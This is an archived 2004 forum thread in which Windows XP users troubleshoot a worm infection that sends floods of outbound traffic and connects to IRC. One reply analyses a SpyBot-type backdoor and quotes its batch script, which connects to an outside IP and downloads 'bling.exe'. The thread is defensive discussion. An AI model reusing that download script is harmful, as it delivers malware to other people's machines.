A Windows XP help forum. PCbanter

If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

Go Back   Home » PCbanter forum » Microsoft Windows XP » Security and Administration with Windows XP
Site Map Home Register Authors List Search Today's Posts Mark Forums Read Web Partners

Worm never seen before



 
 
Thread Tools Display Modes
  #1  
Old December 30th 04, 10:34 AM
I.L.B.
external usenet poster
 
Posts: n/a
Default Worm never seen before

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!



Ads
  #2  
Old December 30th 04, 11:46 AM
Ashok S.
external usenet poster
 
Posts: n/a
Default Worm never seen before


"I.L.B." сообщил/сообщила в новостях следующее:
...
Hi all ;

I am just experiencing a strange kind of infection I don't know wether is
a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound
packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some
strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!



Scan for spyware programs. Use adaware or spybot for it. Make sure your
antivirus is uptodate. Scan for trojans as well, www.moosoft.com has a free
scanner. If your router has a build in firewall, use it or download a one of
the many around. Zone Alarm has a free version.
Also see http://www.pacs-portal.co.uk/startup_content.php to see what
programs are running in Task Manager and what they are.
A good information site on firewall
http://computer.howstuffworks.com/firewall.htm
Ashok S.


  #3  
Old December 30th 04, 12:30 PM
bluddihun
external usenet poster
 
Posts: n/a
Default Worm never seen before

I just tried the moosoft scanner and it seems to work ok, identifying a
small demonstration app I dnloaded from gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper' that is a legit process, as is
microsoft-ds (smb).
svchost is the generic windows services host process and multiple instances
are normal.
As to the burst of data outbound, I don't know ...
good luck.

"I.L.B." wrote in message
...
Hi all ;

I am just experiencing a strange kind of infection I don't know wether is
a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound
packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some
strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!





  #4  
Old December 30th 04, 01:04 PM
Stan Goodman
external usenet poster
 
Posts: n/a
Default Worm never seen before

On Thu, 30 Dec 2004 09:34:57 UTC, "I.L.B." opined:

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!


Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
  #5  
Old December 30th 04, 01:18 PM
Lars M. Hansen
external usenet poster
 
Posts: n/a
Default Worm never seen before

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh


Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.


Bullsh*t.

Lars M. Hansen
http://www.hansenonline.net
(replace 'badnews' with 'news' in e-mail address)
  #6  
Old December 30th 04, 04:23 PM
Beauregard T. Shagnasty
external usenet poster
 
Posts: n/a
Default Worm never seen before

In alt.comp.virus, I.L.B. wrote:

Hi all
I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??


Hub/router? Do you mean the DSL modem? It is neither a hub nor a
router. You should have a real router between the DSL modem and your
computer.

- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...


Ah. I'd bet that your computer is compromised and has become a zombie
for spammers. You are likely relaying spam. (Nearly 3/4 of the spam I
receive comes from someone's broadband connection.)

If you had a software firewall that monitored Outgoing traffic, you
could block it. If you had a firewall, you probably wouldn't be infected.

- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.


...probably the spammer's connection to you.

- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...


What tools did you use?

http://home.rochester.rr.com/bshagna...s.html#spyware

--
-bts
-This space intentionally left blank.
  #7  
Old December 30th 04, 04:56 PM
I.L.B.
external usenet poster
 
Posts: n/a
Default This is really strange...

Thanks guys, but I just ran the scanners you told me with no results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection, I
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first, an ESTABLISHED connection to
"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
meanwhile I have no access to web surf nor anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I re-installed XP, so ain't got time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...



"I.L.B." wrote in message
...
Hi all ;

I am just experiencing a strange kind of infection I don't know wether is

a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound

packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some

strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!





  #8  
Old December 30th 04, 05:30 PM
Beauregard T. Shagnasty
external usenet poster
 
Posts: n/a
Default This is really strange... [was: Worm never seen before]

In alt.comp.virus, I.L.B. wrote:

[Stop changing the Subject line.]

Thanks guys, but I just ran the scanners you told me with no
results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2....


Did you have your *firewall* turned on *before* going on line?

http://www.theregister.co.uk/2004/08/19/infected_in20_minutes/

--
-bts
-This space intentionally left blank.
  #9  
Old December 30th 04, 05:47 PM
Gerard Bok
external usenet poster
 
Posts: n/a
Default Worm never seen before

On Thu, 30 Dec 2004 11:30:28 GMT, "bluddihun"
wrote:

I just tried the moosoft scanner and it seems to work ok, identifying a
small demonstration app I dnloaded from gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper' that is a legit process, as is
microsoft-ds (smb).
svchost is the generic windows services host process and multiple instances
are normal.


True.
But that does not mean that one (or more) of the svchost
instances are caused by a worm or other malware :-)

(Why write the entire virus when you have Windows available :-)

As to the burst of data outbound, I don't know ...


--
Kind regards,
Gerard Bok
  #10  
Old December 30th 04, 06:04 PM
John Coutts
external usenet poster
 
Posts: n/a
Default This is really strange...

It sounds like one of the many variants of the SpyBot backdoor trojan.
Typically, what these worms do is set up a connection to an IRC chat channel on
port 6667 to listen for further instructions. They can be very sophisticated in
that they will hide themselves and re-establish themselves when removed. For
example, I found one called bling.exe. This program was used to install
mswin.exe and msdll.gif. mswin.exe was an IRC proxy program, and
msdll.gif was the configuration file used to load it. Another program was
loaded called hidden32.exe, and this was used to load the IRC program and
hide it from the task list. It also loaded it's own kernel32.exe, of which
there may be multiple copies running. mswin.exe was insructed which one to
use from the file mybot.pid, which stored the Process ID. The IRC proxy
program sat idle for 10 days, and then one day when I logged in under an
administrator account, it activated an open FTP server program called U-SERV.

All this was accomplished using a Microsoft vulnerability on port 445. It
was able to activate a TFTP session and run a batch file simply called "o",
which was then used to download the bling.exe file:

open 142.149.31.32 22187
user 1 1
get bling.exe
quit

Removing bling.exe will not remove the established IRC proxy. As a matter of
fact, every time the proxy program was removed it would reactivate through a
series of batch files. I had to boot up in safe mode, remove the registry
entries, and then physically remove the backdoor programs from the %system%
directory. Only then could I safely boot up in normal mode without reactivating
the proxy program.

J.A. Coutts
*************** REPLY SEPARATER ****************
In article ,
says...

Thanks guys, but I just ran the scanners you told me with no results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection, I
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first, an ESTABLISHED connection to
"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
meanwhile I have no access to web surf nor anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I re-installed XP, so ain't got time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...



"I.L.B." wrote in message
...
Hi all ;

I am just experiencing a strange kind of infection I don't know wether is

a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound

packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some

strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!






  #11  
Old December 30th 04, 06:13 PM
Stan Goodman
external usenet poster
 
Posts: n/a
Default Worm never seen before

On Thu, 30 Dec 2004 12:18:06 UTC, Lars M. Hansen
opined:

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh


Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.


Bullsh*t.


There's no "I" on your keyboard?

=;-/8

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
  #12  
Old December 30th 04, 08:07 PM
I.L.B.
external usenet poster
 
Posts: n/a
Default How I solved this...

Finally... I had to download an standalone Service Pack 2 of XP... that
includes improved security, firewalls, etc. and now my XP is back to normal
life again.

So the XP I got it is risky!. It begins to make strange things just
installed and it needs to be "servicepacked" ASAP !!!

Jesus !


  #13  
Old December 30th 04, 08:09 PM
Jason Edwards
external usenet poster
 
Posts: n/a
Default Worm never seen before

"Bart Bailey" wrote in message
...
In posted on Thu, 30 Dec
2004 10:23:19 -0500, Beauregard T. Shagnasty wrote: Begin

You should have a real router between the DSL modem and your
computer.


Why?


It depends on what is meant by a real router.
A NAT router will ignore incoming connection requests and will not forward
them to your PC unless it is set up to do port forwarding.
Some DSL modems (which use telephone lines) have built in NAT routers but
I've yet to come across a cable (which uses a TV cable) modem that does.

Why is a NAT router a good idea?
Because when you're setting up a freshly installed Windows 2000 or Windows
XP PC it will take about 30 seconds to get a worm infection if you don't
have a separate box between you and the Internet which blocks incoming
connection requests.
There are two ways around this when doing a reinstall but almost no-one uses
them because 1 is too easy to forget and 2 is too difficult.
1. Turn on the built in firewall in XP BEFORE you connect the
Internet/modem.
2. Make yourself a CD with the most recent service pack slipstreamed in.

In the time it took to write this I have logged five incoming TCP port 135
connection requests.

http://www.google.com/search?&q=tcp+port+135+blaster

Jason


--

Bart



  #14  
Old December 30th 04, 08:16 PM
Beauregard T. Shagnasty
external usenet poster
 
Posts: n/a
Default How I solved this...

Please don't start new threads when you really wanted to reply to your
other message.

In alt.comp.virus, I.L.B. wrote:
Finally... I had to download an standalone Service Pack 2 of XP...
that includes improved security, firewalls, etc. and now my XP is
back to normal life again.


We will see...

So the XP I got it is risky!. It begins to make strange things just
installed and it needs to be "servicepacked" ASAP !!!


No it doesn't, but it does need to be firewalled before ever
connecting to the internet.

Jesus !


Yes. Does your XP SP2 *really* have:
X-Newsreader: Microsoft Outlook Express 5.00.2919.6600

or are you posting from some other ancient machine?

--
-bts
-This space intentionally left blank.
  #15  
Old December 30th 04, 09:57 PM
Robert
external usenet poster
 
Posts: n/a
Default Worm never seen before

On Fri, 31 Dec 2004 20:32:56 +0100, Gabriele Neukam wrote:

Good idea. If I (ever?) get one, it will be behind a broadband router
with NAT (already there), and I'll never browse with IE, or mail with
OE. Remember how it was announced: "The safest Windows ever". Now it is
the most often(ly?) attacked and corrupted one.


Two things that do not go together; Microsoft and Security


--

Regards
Robert

Smile... it increases your face value!

 




Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
What is connected to which? kiadau New Users to Windows XP 7 February 14th 07 09:02 PM
E-mail worm or mother-in-law worm Buckus General XP issues or comments 2 October 23rd 04 03:10 AM
blaster worm Olga Security and Administration with Windows XP 7 September 17th 04 02:55 AM
Korgo.R worm! won't go away! Johannes Enstad General XP issues or comments 2 August 8th 04 10:02 PM
win32bagel worm revtkc Performance and Maintainance of XP 2 July 22nd 04 06:58 AM






All times are GMT +1. The time now is 02:49 PM.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright ╘2004-2024 PCbanter.
The comments are property of their posters.